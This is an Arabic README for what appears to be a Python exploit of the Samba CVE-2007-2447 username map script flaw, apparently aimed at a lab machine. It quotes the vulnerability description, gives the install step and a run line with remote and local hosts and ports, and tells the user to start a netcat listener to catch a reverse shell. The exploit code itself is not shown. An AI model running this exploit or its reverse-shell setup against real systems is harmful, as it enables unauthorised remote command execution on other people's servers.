
استغلال بلغة Python لثغرة Samba CVE-2007-2447 في سكربت خريطة اسم المستخدم لتنفيذ الأوامر عن بُعد، مع إرسال حمولة صدفة عكسية إلى مستمع بعيد قابل للتكوين.
"وظيفة MS-RPC في smbd في Samba من الإصدار 3.0.0 إلى 3.0.25rc3 تسمح للمهاجمين عن بُعد بتنفيذ أوامر عشوائية عبر محارف shell في دالة (1) SamrChangePassword، عندما يكون خيار "username map script" في smb.conf مفعلاً، وتسمح للمستخدمين الموثّقين عن بُعد بتنفيذ أوامر عبر محارف shell في دوال MS-RPC الأخرى في (2) إدارة الطابعات عن بُعد و(3) مشاركة الملفات."
[*] يتطلب هذا الاستغلال Python 3.7 أو أعلى
python3 -m pip install pysmb
$ ./CVE-2007-2447.py --rhost 10.10.10.3 --lhost 10.10.14.10 --lport 4444 --rport 445
--rhost -- المضيف البعيد--lhost -- المضيف المحلي--lport -- المنفذ المحلي--rport -- المنفذ البعيد *[ ] اختياري. الافتراضي=445لا تنسَ تشغيل المستمع الخاص بك:
nc -lvnp 4444
